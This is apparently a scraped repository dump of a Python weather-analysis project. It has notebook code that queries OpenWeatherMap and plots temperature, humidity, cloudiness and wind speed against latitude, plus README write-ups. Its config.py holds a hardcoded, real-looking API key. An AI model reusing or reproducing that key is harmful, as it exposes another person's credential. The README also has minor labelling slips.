[ { "alpha_fraction": 0.5, "alphanum_fraction": 0.5, "avg_line_length": 17, "blob_id": "2b475aa6176e704ac359dfb4bb0dc6ceed53d398", "content_id": "833662a8c6a445f61c4da81eec532435f308b7f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 18, "license_type": "no_license", "max_line_length": 17, "num_lines": 1, "path": "/config.py", "repo_name": "aidinhass/weatherpy", "src_encoding": "UTF-8", "text": "api_key = \"cf48ed22aed78ca5359adb43dcdbbd2b\"\n" }, { "alpha_fraction": 0.5281491279602051, "alphanum_fraction": 0.5633859634399414, "avg_line_length": 23.39678192138672, "blob_id": "65ce262b8acdddb5a66876b51d1987e8af2b2975", "content_id": "cea0b9ac43922bfcc764bf2d75bda096a45d5223", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 27301, "license_type": "no_license", "max_line_length": 404, "num_lines": 1119, "path": "/notebooks/README.md", "repo_name": "aidinhass/weatherpy", "src_encoding": "UTF-8", "text": "\n## 1. Insights\n\nThe climatic variations as a function of geograpy are being investigated through 2-d scatter and climatic geomap plots. This involves analyzing the association beween four basic climatic factors including temperature, humidity, cloudiness and wind speed with respect to latitude and latitude-longitude.\n\n### 1.1. Climate and Latitude\n### 1.1.1. Temperature (F) vs. Latitude\nInvestigating temperature at different latitudes shows:\n- There exists a negative association between temperature and distance from equator. Temperature smoothly falls off with latitude towards the two poles. The regions close to the equator experience higher temperatures compared to those close to the North and South poles.\n\n### 1.1.2. Humidity (F) vs. Latitude\nInvestigating humidity at different latitudes shows:\n- There exists a weak negative association between the temperature and the distance from equator. As one moves away from the equator, the humidity decreases .\n\n### 1.1.3. Cloudiness (F) vs. Latitude\nInvestigating the cloudiness at different latitude shows:\nTher is no clear association with latitude.\n\n### 1.1.4. Wind Speed vs (Total Drivers vs Total Rides)\nInvestigating the wind speed at different latitudes shows:\n- There exist a weak positive association between wind speed and distance from equator.\n\n### 1.2. Climate and Latitude-Longitude\nTBA\n\n## 2. Limitations\n\n- The current analysis has heavily focused on temperature records sampled at cities across the world that can easily influenced by the non-unfiormity of city distributions. As the land masses are distributed predominantly in the Northern Hemisphere (68%) compared to the Southern Hemisphere (32%), it is quite likely that more cities are located in Northern hemisphere compared to the Sothern Hemisphere.\n- The climatic variation has only been assessed with respect to latitude while ingnorng other plusible governing factors. It is well know that any climatic phenomenon depends on other factors such as altitude and local topgrapy and clearly, an accurate climatic analysis can be achieved as any potential factor being accounted for global level climatic variations is considered. \n\n## 3. Implementation\n\n### 3.1. Import Dependecies\n\n\n```python\n# import dependecies\n%matplotlib inline\nimport os, sys, inspect\nimport time\nimport random\nimport requests\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\nfrom mpl_toolkits.basemap import Basemap as bm\nfrom itertools import product\nfrom citipy import citipy as cp\nfrom pprint import pprint\n\n# add parent dir to system dir\ncurrent_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))\nroot_dir = os.path.dirname(current_dir)\nsys.path.insert(0, root_dir) \n```\n\n### 3.2. Import API keys\n\n\n```python\n# OpenWeatherMap api key\nfrom config import api_key\n```\n\n### 3.3. Set global varriables\n\n\n```python\nDEGREE = u\"\\u00b0\"\n```\n\n### 3.4. Define functions\n\n\n```python\ndef scatter(\n x, y,\n marker=\"o\",\n markersize=6,\n markeredgecolor=\"black\",\n markeredgewidth=1,\n markerfacecolor=\"black\",\n fillstyle=\"full\",\n linestyle=\"\",\n alpha=.7,\n xlabel=\"\",\n ylabel=\"\",\n label=\"\",\n title=\"\",\n xlim=None,\n ylim=None,\n fontsize_title=14,\n fontsize_label=13,\n fontsize_xtick=12,\n fontsize_ytick=12,\n figsize=(7, 5),\n legend=True,\n grid=True,\n ax=None,):\n \"\"\"Scatter plot given input 'x' and 'y'. Wrapper function to interface 'matplotlib.pyplot.plot'\n to perform scatter plot.\n \"\"\"\n \n # create figure/axis handler\n if ax is None:\n fig = plt.figure(figsize=figsize)\n ax = fig.subplots(1,1)\n \n # scatter plot\n ax.plot(\n x, y,\n marker=marker,\n markersize=markersize,\n markeredgecolor=markeredgecolor,\n markeredgewidth=markeredgewidth,\n markerfacecolor=markerfacecolor,\n fillstyle=fillstyle,\n linestyle=linestyle,\n alpha=alpha,\n label=label,\n )\n # set title\n _ = ax.set_title(\n title,\n fontsize=fontsize_title,\n fontweight=\"bold\"\n )\n # set axis labels\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n ax.xaxis.label.set_size(fontsize_label)\n ax.yaxis.label.set_size(fontsize_label)\n \n # set axis ticks\n [tick.label.set_fontsize(fontsize_xtick) for tick in ax.xaxis.get_major_ticks()]\n [tick.label.set_fontsize(fontsize_ytick) for tick in ax.yaxis.get_major_ticks()]\n \n # set axis range limits \n ax.set_xlim(xlim)\n ax.set_ylim(ylim)\n \n # set legend\n if legend and (label is not \"\"):\n ax.legend()\n \n # set grid\n if grid:\n ax.grid(\n True,\n color=\"grey\",\n linestyle=\":\",\n linewidth=1.5,\n alpha=0.5\n )\n \n # set tight layout\n plt.tight_layout()\n return ax\n\n\ndef scatter_weather_vs_latitude():\n \"\"\"Scatter plot weather trend vs. latitude. Wrapper fucntion to interface 'scatter' to perform\n weather data scatter plot, handeling different colors for north- and south-hemisphere.\n \"\"\"\n # set figure size\n fig = plt.figure(figsize=(figsize))\n ax = fig.subplots(1, 1)\n \n # get x-axes and y-axes data \n x = df[\"Latitude\"].values\n y = df[metric].values\n \n # set axes params \n xlabel = \"Latitude\"\n ylabel = f\"{metric} ({unit})\"\n time_str = time.strftime(\"'%Y-%m-%d %H:%M'\", current_time)\n title = f\"{metric} variations ({unit}) vs Latitude for {time_str}\"\n \n # scatter plot for north-hemisphere\n ax = scatter(\n x=x[x>=0],\n y=y[x>=0],\n markerfacecolor=\"red\",\n markeredgecolor=\"red\",\n xlabel=xlabel,\n ylabel=ylabel,\n title=title,\n xlim=[-90, 90],\n ylim=ylim,\n label=\"Northern Hemisphere\",\n ax=ax,\n )\n \n # scatter plot for south-hemisphere\n ax = scatter(\n x=x[x<0],\n y=y[x<0],\n markerfacecolor=\"navy\",\n markeredgecolor=\"navy\",\n xlabel=xlabel,\n ylabel=ylabel,\n title=title,\n xlim=[-90, 90],\n ylim=ylim,\n label=\"Southern Hemisphere\",\n ax=ax,\n )\n return ax, fig\n\n\ndef geomap_scatter(lats, lons, vals=None, vlim=None, markersize=4,\n fontsize_title=12, fontsize_label=11, fontsize_xtick=9, fontsize_ytick=9,\n alpha=0.95, title=\"\", label=\"\", figsize=(10, 7),\n colormap=\"bwr\"):\n \"\"\"Geomap plot weather trends. Wrapper fucntion to interface 'mpl_toolkits.basemap'to perform\n geo-map for weather data.\n \"\"\"\n \n \n # create figure/axis handler\n fig = plt.figure(figsize=figsize)\n ax = fig.subplots(1, 1)\n \n # create a base map object\n bmap = bm(\n projection='merc',\n llcrnrlat=-80,\n urcrnrlat=80,\n llcrnrlon=-180,\n urcrnrlon=180,\n lat_ts=50,\n resolution=\"l\")\n \n # draw coast lines\n bmap.drawcoastlines()\n \n # draw countries\n# bmap.drawcountries()\n \n # draw/set up parllel lines\n parallels = np.arange(-90.,91.,30.)\n bmap.drawparallels(parallels)\n bmap.drawparallels(\n parallels,\n labels=[True,False,False,False],\n fontsize=fontsize_ytick)\n \n # draw/set up meridians\n meridians = np.arange(-180.,181.,30.)\n bmap.drawmeridians(meridians)\n bmap.drawmeridians(\n meridians,\n labels=[True,False,False,True],\n fontsize=fontsize_xtick,)\n \n # draw/set up map boundaries\n bmap.drawmapboundary(fill_color='white')\n \n # draw/set up continents\n bmap.fillcontinents(color=\"#cc9955\", lake_color=\"steelblue\", alpha=0.2)\n \n # set title\n _ = ax.set_title(\n title,\n fontsize=fontsize_title,\n fontweight=\"bold\"\n )\n \n # set axis ticks\n [tick.label.set_fontsize(fontsize_xtick) for tick in ax.xaxis.get_major_ticks()]\n [tick.label.set_fontsize(fontsize_ytick) for tick in ax.yaxis.get_major_ticks()]\n plt.tight_layout() \n\n # tranform input lats and lons to map projections\n x, y = bmap(lons, lats)\n \n if vals is None:\n # perform 2-D scatter plot\n ax.plot(\n x, y,\n marker=\"o\",\n linestyle=\"\",\n linewidth=2,\n markerfacecolor=\"royalblue\",\n markeredgecolor=\"mediumblue\",\n markersize=markersize,\n alpha=alpha)\n else:\n # perom bubble plot\n if vlim is None:\n vlim = [min(vals), max(vals)]\n # set a colormap\n cmap = plt.cm.get_cmap(colormap)\n cax = plt.scatter(\n x=x, y=y, c=vals,\n vmin=vlim[0],\n vmax =vlim[1],\n cmap=cmap,\n s=50,\n edgecolors='none',\n alpha=.95,\n )\n # set color bar\n cbar = plt.colorbar(cax, shrink =1, pad=0.01)\n cbar.set_label(label)\n date = datetime.utcnow()\n CS = bmap.nightshade(date, alpha=0.2)\n \n # set tight layout\n plt.tight_layout()\n \n return ax, fig\n\n```\n\n### 3.5. Define setup parameters\n\n\n```python\n# set number of samples\nnm_samples = 700\n# set (latitude, longitude) intervals\nnm_lats = 100\nnm_lons = 100\n# set path to save figures\npath_fig = os.path.join(root_dir, \"reports\", \"figures\")\npath_log = os.path.join(root_dir, \"reports\", \"logs\")\n# set true to save figures\nsave_fig = True\n# set true to save results to csv\nsave_csv = True\n# set true to log print\nverbose = False\n# set figure size\nfigsize = (10, 7)\nmarkersize = 6\n# set api params\nurl = \"http://api.openweathermap.org/data/2.5/weather?\"\nunits = \"imperial\"\nparams = {\n \"appid\": api_key,\n \"units\": units\n}\n```\n\n\n```python\n# generate latitudes and longitudes\nlats = np.linspace(-90, 90, nm_lats)\nlons = np.linspace(-180, 180, nm_lons)\n```\n\n\n```python\ndf = pd.DataFrame()\ndf[\"City Name\"] = [\"\"]\ndf[\"Country Code\"] = [\"\"]\n\nindex = 0\nfor lat, lon in product(lats, lons):\n city = cp.nearest_city(lat, lon)\n city_name = city.city_name.title()\n country_code = city.country_code\n \n if not df[\"City Name\"].isin([city_name]).any():\n if verbose:\n print(\"{:4d} ({:+07.2f}{:s},{:+07.2f}{:s}) {:20s} {:s}\".format(\n index, lat, DEGREE, lon, DEGREE, city_name, country_code))\n df.loc[index, \"City Name\"] = city_name\n df.loc[index, \"Country Code\"] = country_code\n index += 1\n```\n\n\n```python\ndf.head(20)\n```\n\n\n\n\n<div>\n<style scoped>\n .dataframe tbody tr th:only-of-type {\n vertical-align: middle;\n }\n\n .dataframe tbody tr th {\n vertical-align: top;\n }\n\n .dataframe thead th {\n text-align: right;\n }\n</style>\n<table border=\"1\" class=\"dataframe\">\n <thead>\n <tr style=\"text-align: right;\">\n <th></th>\n <th>City Name</th>\n <th>Country Code</th>\n </tr>\n </thead>\n <tbody>\n <tr>\n <th>0</th>\n <td>Vaini</td>\n <td>to</td>\n </tr>\n <tr>\n <th>1</th>\n <td>Mataura</td>\n <td>pf</td>\n </tr>\n <tr>\n <th>2</th>\n <td>Rikitea</td>\n <td>pf</td>\n </tr>\n <tr>\n <th>3</th>\n <td>Punta Arenas</td>\n <td>cl</td>\n </tr>\n <tr>\n <th>4</th>\n <td>Ushuaia</td>\n <td>ar</td>\n </tr>\n <tr>\n <th>5</th>\n <td>Hermanus</td>\n <td>za</td>\n </tr>\n <tr>\n <th>6</th>\n <td>Bredasdorp</td>\n <td>za</td>\n </tr>\n <tr>\n <th>7</th>\n <td>Port Elizabeth</td>\n <td>za</td>\n </tr>\n <tr>\n <th>8</th>\n <td>Port Alfred</td>\n <td>za</td>\n </tr>\n <tr>\n <th>9</th>\n <td>East London</td>\n <td>za</td>\n </tr>\n <tr>\n <th>10</th>\n <td>Taolanaro</td>\n <td>mg</td>\n </tr>\n <tr>\n <th>11</th>\n <td>Busselton</td>\n <td>au</td>\n </tr>\n <tr>\n <th>12</th>\n <td>Albany</td>\n <td>au</td>\n </tr>\n <tr>\n <th>13</th>\n <td>New Norfolk</td>\n <td>au</td>\n </tr>\n <tr>\n <th>14</th>\n <td>Hobart</td>\n <td>au</td>\n </tr>\n <tr>\n <th>15</th>\n <td>Bluff</td>\n <td>nz</td>\n </tr>\n <tr>\n <th>16</th>\n <td>Kaitangata</td>\n <td>nz</td>\n </tr>\n <tr>\n <th>17</th>\n <td>Cape Town</td>\n <td>za</td>\n </tr>\n <tr>\n <th>18</th>\n <td>Kruisfontein</td>\n <td>za</td>\n </tr>\n <tr>\n <th>19</th>\n <td>Saint-Philippe</td>\n <td>re</td>\n </tr>\n </tbody>\n</table>\n</div>\n\n\n\n### 3.6. Collect evaluation city weather data\n\n\n```python\n# get 'n' random samples from collected cities \ndf = df.loc[\n np.random.choice(list(range(0, df.shape[0])),\n size=nm_samples,\n replace=False), :]\ndf[\"Latitude\"] = \"\"\ndf[\"Longitude\"] = \"\"\ndf[\"Temperature\"] = \"\"\ndf[\"Humidity\"] = \"\"\ndf[\"Cloudiness\"] = \"\"\ndf[\"Wind-Speed\"] = \"\"\ndf[\"Wind-Direction\"] = \"\"\n\n# get current time\ncurrent_time = time.gmtime()\n\n# collect weather data from API\nfor index, row in df.iterrows():\n city_name = row[\"City Name\"]\n country_code = row[\"Country Code\"]\n params[\"q\"] = f\"{city_name},{country_code}\"\n response_ = requests.get(url, params)\n response = response_.json()\n try:\n df.loc[index][\"Latitude\"] = response[\"coord\"][\"lat\"]\n df.loc[index][\"Longitude\"] = response[\"coord\"][\"lon\"]\n df.loc[index][\"Temperature\"] = response[\"main\"][\"temp\"]\n df.loc[index][\"Humidity\"] = response[\"main\"][\"humidity\"]\n df.loc[index][\"Cloudiness\"] = response[\"clouds\"][\"all\"] \n df.loc[index][\"Wind-Speed\"] = response[\"wind\"][\"speed\"]\n df.loc[index][\"Wind-Direction\"] = response[\"wind\"][\"deg\"]\n if verbose:\n print(f\"{index} {city_name} <{response_.url}>: OK\")\n except (KeyError, IndexError):\n if verbose:\n print(f\"{index} {city_name} <{response_.url}>: ERROR, skipped\")\n df.drop(labels=index, inplace=True)\ndf = df.reset_index()\n```\n\n\n```python\ndf.head(20)\n```\n\n\n\n\n<div>\n<style scoped>\n .dataframe tbody tr th:only-of-type {\n vertical-align: middle;\n }\n\n .dataframe tbody tr th {\n vertical-align: top;\n }\n\n .dataframe thead th {\n text-align: right;\n }\n</style>\n<table border=\"1\" class=\"dataframe\">\n <thead>\n <tr style=\"text-align: right;\">\n <th></th>\n <th>index</th>\n <th>City Name</th>\n <th>Country Code</th>\n <th>Latitude</th>\n <th>Longitude</th>\n <th>Temperature</th>\n <th>Humidity</th>\n <th>Cloudiness</th>\n <th>Wind-Speed</th>\n <th>Wind-Direction</th>\n </tr>\n </thead>\n <tbody>\n <tr>\n <th>0</th>\n <td>2362</td>\n <td>Aklavik</td>\n <td>ca</td>\n <td>68.22</td>\n <td>-135.01</td>\n <td>28.4</td>\n <td>92</td>\n <td>90</td>\n <td>9.17</td>\n <td>280</td>\n </tr>\n <tr>\n <th>1</th>\n <td>1585</td>\n <td>Kaka</td>\n <td>tm</td>\n <td>37.35</td>\n <td>59.62</td>\n <td>87.58</td>\n <td>30</td>\n <td>0</td>\n <td>3.71</td>\n <td>52.0002</td>\n </tr>\n <tr>\n <th>2</th>\n <td>103</td>\n <td>Veinticinco De Mayo</td>\n <td>ar</td>\n <td>-27.38</td>\n <td>-54.75</td>\n <td>49.69</td>\n <td>88</td>\n <td>36</td>\n <td>2.71</td>\n <td>95.5002</td>\n </tr>\n <tr>\n <th>3</th>\n <td>354</td>\n <td>Tsiroanomandidy</td>\n <td>mg</td>\n <td>-18.77</td>\n <td>46.05</td>\n <td>80.5</td>\n <td>33</td>\n <td>0</td>\n <td>5.53</td>\n <td>116.502</td>\n </tr>\n <tr>\n <th>4</th>\n <td>81</td>\n <td>Lakes Entrance</td>\n <td>au</td>\n <td>-37.88</td>\n <td>147.99</td>\n <td>53.47</td>\n <td>95</td>\n <td>0</td>\n <td>6.96</td>\n <td>80.5002</td>\n </tr>\n <tr>\n <th>5</th>\n <td>2390</td>\n <td>Zhigansk</td>\n <td>ru</td>\n <td>66.77</td>\n <td>123.37</td>\n <td>56.44</td>\n <td>41</td>\n <td>12</td>\n <td>3.71</td>\n <td>357</td>\n </tr>\n <tr>\n <th>6</th>\n <td>742</td>\n <td>Amapa</td>\n <td>br</td>\n <td>-1.83</td>\n <td>-56.23</td>\n <td>75.16</td>\n <td>93</td>\n <td>0</td>\n <td>2.37</td>\n <td>20.0002</td>\n </tr>\n <tr>\n <th>7</th>\n <td>1018</td>\n <td>Lahij</td>\n <td>ye</td>\n <td>13.06</td>\n <td>44.88</td>\n <td>106.75</td>\n <td>21</td>\n <td>0</td>\n <td>8.63</td>\n <td>147</td>\n </tr>\n <tr>\n <th>8</th>\n <td>2356</td>\n <td>Sangar</td>\n <td>ru</td>\n <td>63.92</td>\n <td>127.47</td>\n <td>63.64</td>\n <td>31</td>\n <td>0</td>\n <td>6.85</td>\n <td>302</td>\n </tr>\n <tr>\n <th>9</th>\n <td>745</td>\n <td>Jardim</td>\n <td>br</td>\n <td>-21.48</td>\n <td>-56.15</td>\n <td>64.99</td>\n <td>78</td>\n <td>12</td>\n <td>10.09</td>\n <td>81.0002</td>\n </tr>\n <tr>\n <th>10</th>\n <td>1681</td>\n <td>Sitges</td>\n <td>es</td>\n <td>41.24</td>\n <td>1.82</td>\n <td>68.58</td>\n <td>77</td>\n <td>75</td>\n <td>17.22</td>\n <td>60</td>\n </tr>\n <tr>\n <th>11</th>\n <td>1984</td>\n <td>Zavitinsk</td>\n <td>ru</td>\n <td>50.11</td>\n <td>129.44</td>\n <td>61.03</td>\n <td>56</td>\n <td>44</td>\n <td>2.37</td>\n <td>230.5</td>\n </tr>\n <tr>\n <th>12</th>\n <td>1603</td>\n <td>Ishinomaki</td>\n <td>jp</td>\n <td>38.42</td>\n <td>141.3</td>\n <td>64.4</td>\n <td>63</td>\n <td>40</td>\n <td>11.41</td>\n <td>120</td>\n </tr>\n <tr>\n <th>13</th>\n <td>1427</td>\n <td>Yafran</td>\n <td>ly</td>\n <td>32.06</td>\n <td>12.53</td>\n <td>77.68</td>\n <td>46</td>\n <td>0</td>\n <td>3.94</td>\n <td>123</td>\n </tr>\n <tr>\n <th>14</th>\n <td>2313</td>\n <td>Troitsko-Pechorsk</td>\n <td>ru</td>\n <td>62.71</td>\n <td>56.19</td>\n <td>53.74</td>\n <td>56</td>\n <td>0</td>\n <td>7.85</td>\n <td>268.5</td>\n </tr>\n <tr>\n <th>15</th>\n <td>1459</td>\n <td>Portales</td>\n <td>us</td>\n <td>34.19</td>\n <td>-103.33</td>\n <td>67.55</td>\n <td>51</td>\n <td>1</td>\n <td>4.7</td>\n <td>90</td>\n </tr>\n <tr>\n <th>16</th>\n <td>853</td>\n <td>Labuan</td>\n <td>my</td>\n <td>5.33</td>\n <td>115.2</td>\n <td>88.79</td>\n <td>74</td>\n <td>75</td>\n <td>8.05</td>\n <td>280</td>\n </tr>\n <tr>\n <th>17</th>\n <td>529</td>\n <td>Jatiroto</td>\n <td>id</td>\n <td>-7.61</td>\n <td>109.46</td>\n <td>82.63</td>\n <td>88</td>\n <td>44</td>\n <td>15.79</td>\n <td>126.5</td>\n </tr>\n <tr>\n <th>18</th>\n <td>1827</td>\n <td>Merrill</td>\n <td>us</td>\n <td>42.03</td>\n <td>-121.6</td>\n <td>48.2</td>\n <td>87</td>\n <td>90</td>\n <td>11.41</td>\n <td>250</td>\n </tr>\n <tr>\n <th>19</th>\n <td>1007</td>\n <td>Sokoto</td>\n <td>ng</td>\n <td>13.06</td>\n <td>5.24</td>\n <td>85.42</td>\n <td>76</td>\n <td>48</td>\n <td>12.44</td>\n <td>206</td>\n </tr>\n </tbody>\n</table>\n</div>\n\n\n\n### 3.7. Plot city distribution map\n\n\n```python\ntime_str = time.strftime(\"'%Y-%m-%d %H:%M'\", current_time)\ntitle = f\"City Weather Data Distribution for {time_str}\"\n\nax, fig = geomap_scatter(\n df[\"Latitude\"].values,\n df[\"Longitude\"].values,\n vals=None,\n vlim=None,\n markersize=markersize,\n title=title,\n figsize=figsize)\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"city-distribution-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1708: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n limb = ax.axesPatch\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1711: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n if limb is not ax.axesPatch:\n\n\n\n![png](../images/output_22_1.png)\n\n\n### 3.8. Scatter plots\n\n### 3.8.1. Temperature vs. Latitude\n\n\n```python\nmetric = \"Temperature\"\nunit = f\"{DEGREE}F\"\nylim = None\n\nax , fig = scatter_weather_vs_latitude()\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-vs-latitude-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n\n![png](../images/output_25_0.png)\n\n\n### 3.8.2. Humidity vs. Latitude\n\n\n```python\nmetric = \"Humidity\"\nunit = \"%\"\nylim = [0, 100]\n\nax , fig = scatter_weather_vs_latitude()\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-vs-latitude-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n\n![png](../images/output_27_0.png)\n\n\n### 3.8.3. Cloudiness vs. Latitude\n\n\n```python\nmetric = \"Cloudiness\"\nunit = \"%\"\nylim = [0, 100]\n\n\nax , fig = scatter_weather_vs_latitude()\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-vs-latitude-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n\n![png](../images/output_29_0.png)\n\n\n### 3.8.4. Wind-Speed vs. Latitude\n\n\n```python\nmetric = \"Wind-Speed\"\nunit = \"mph\"\nylim = None\n\nax, fig = scatter_weather_vs_latitude()\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-vs-latitude-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n\n![png](../images/output_31_0.png)\n\n\n### 3.9. Geomaps\n\n### 3.9.1. Temperature\n\n\n```python\nmetric = \"Temperature\"\nunit = f\"{DEGREE}F\"\ncolormap = \"bwr\"\nvlim = None\n\ntime_str = time.strftime(\"'%Y-%m-%d %H:%M'\", current_time)\ntitle = f\"{metric} ({unit}) Geomap for {time_str}\"\nax , fig = geomap_scatter(df[\"Latitude\"].values,\n df[\"Longitude\"].values,\n df[metric].values,\n vlim=vlim,\n markersize=markersize,\n title=title,\n figsize=figsize,\n colormap=colormap)\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-geomap-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1708: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n limb = ax.axesPatch\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1711: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n if limb is not ax.axesPatch:\n\n\n\n![png](../images/output_34_1.png)\n\n\n### 3.9.2. Humidity\n\n\n```python\nmetric = \"Humidity\"\nunit = \"%\"\ncolormap = \"BrBG\"\nvlim = None\n\ntime_str = time.strftime(\"'%Y-%m-%d %H:%M'\", current_time)\ntitle = f\"{metric} ({unit}) Geomap for {time_str}\"\nax , fig = geomap_scatter(df[\"Latitude\"].values,\n df[\"Longitude\"].values,\n df[metric].values,\n vlim=vlim,\n markersize=markersize,\n title=title,\n figsize=figsize,\n colormap=colormap)\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-geomap-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1708: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n limb = ax.axesPatch\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1711: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n if limb is not ax.axesPatch:\n\n\n\n![png](../images/output_36_1.png)\n\n\n### 3.9.3. Cloudiness\n\n\n```python\nmetric = \"Cloudiness\"\nunit = \"%\"\ncolormap = \"hot\"\nvlim = None\n\ntime_str = time.strftime(\"'%Y-%m-%d %H:%M'\", current_time)\ntitle = f\"{metric} ({unit}) Geomap for {time_str}\"\nax , fig = geomap_scatter(df[\"Latitude\"].values,\n df[\"Longitude\"].values,\n df[metric].values,\n vlim=vlim,\n markersize=markersize,\n title=title,\n figsize=figsize,\n colormap=colormap)\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-geomap-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1708: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n limb = ax.axesPatch\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1711: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n if limb is not ax.axesPatch:\n\n\n\n![png](../images/output_38_1.png)\n\n\n### 3.9.4. Wind-Speed\n\n\n```python\nmetric = \"Wind-Speed\"\nunit = \"%\"\ncolormap = \"seismic\"\nvlim = None\n\ntime_str = time.strftime(\"'%Y-%m-%d %H:%M'\", current_time)\ntitle = f\"{metric} ({unit}) Geomap for {time_str}\"\nax , fig = geomap_scatter(df[\"Latitude\"].values,\n df[\"Longitude\"].values,\n df[metric].values,\n vlim=vlim,\n markersize=markersize,\n title=title,\n figsize=figsize,\n colormap=colormap)\nif save_fig:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n fig.savefig(os.path.join(path_fig, f\"{metric}\".lower() + f\"-geomap-{time_str}\"),\n transparent=False, bbox_inches=\"tight\")\n```\n\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1708: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n limb = ax.axesPatch\n /home/h8147/miniconda3/envs/data-bootcamp/lib/python3.6/site-packages/mpl_toolkits/basemap/__init__.py:1711: MatplotlibDeprecationWarning: The axesPatch function was deprecated in version 2.1. Use Axes.patch instead.\n if limb is not ax.axesPatch:\n\n\n\n![png](../images/output_40_1.png)\n\n\n### 3.10. Save city eval data\n\n\n```python\nif save_csv:\n time_str = time.strftime(\"%Y-%m-%d-%H-%M\", current_time)\n df.to_csv(os.path.join(path_log, f\"city-weather-{time_str}.csv\"))\n```\n" }, { "alpha_fraction": 0.7398597002029419, "alphanum_fraction": 0.7538883686065674, "avg_line_length": 41.02564239501953, "blob_id": "875b627129796488497a07255bacaa45e6b743b8", "content_id": "78c28eb59d15e6cf57fd4b00835809c2ad1dc30b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3317, "license_type": "no_license", "max_line_length": 204, "num_lines": 78, "path": "/README.md", "repo_name": "aidinhass/weatherpy", "src_encoding": "UTF-8", "text": "# What's the Weather Like? \n\nBy *Aidin Hassanzadeh*\n___\n\nThis repository contains Python/NootebookIPython files for the 'What's the Weather Like?' project.\nThe aim of this project is to perform quantitative analysis of different weather trend data with respect to latitude.\nThis project follows the below 6 objectives:\n\n- Demonstrate and analyze Temperature variations (F) vs. Latitude\n- Demonstrate and analyze Humidity variations (%) vs. Latitude\n- Demonstrate and analyze Cloudiness variations (%) vs. Latitude\n- Demonstrate and analyze Wind Speed variations (mph) vs. Latitude\n- Demonstrate and analyze Temperature variations (F) vs. Latitude-Longitude\n- Demonstrate and analyze Humidity variations (%) vs. Latitude-Longitude\n- Demonstrate and analyze Cloudiness variations (%) vs. Latitude-Longitude\n- Demonstrate and analyze Wind Speed variations (mph) vs. Latitude-Longitude\n\n## Data\nThe evaluation weather data is a collection of current weather data retrieved from 1000 different cities uniformly sampled from across the world.\nThis data set is collected through [OpenWeatherMap Current Weather API](https://openweathermap.org/current), regularly updated by more than 40,000 weather stations covering over 200,000 cities world wide.\n\nTo obtain a uniformly distributed city weather data, cities were sampled by a 2 dimensional uniform latitude-longitude grid sampling scheme.\nA uniform linear grid of latitudes and longitudes with fixed spacing was created and a set of uniques cities were uniformly sampled based the vertices of the grid.\nThe generation of the evaluation data consists of the following stages:\n\n- Create a uniform latitude-longitude grid with fixed equal spacing\n- 